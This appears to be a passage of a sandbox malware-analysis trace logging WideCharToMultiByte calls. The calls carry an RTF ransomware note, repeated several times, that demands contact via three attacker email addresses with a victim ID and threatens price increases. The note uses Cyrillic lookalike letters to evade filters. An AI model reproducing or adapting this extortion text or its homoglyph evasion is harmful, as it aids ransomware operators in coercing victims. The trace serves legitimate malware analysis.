y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0067.688] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0067.688] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in 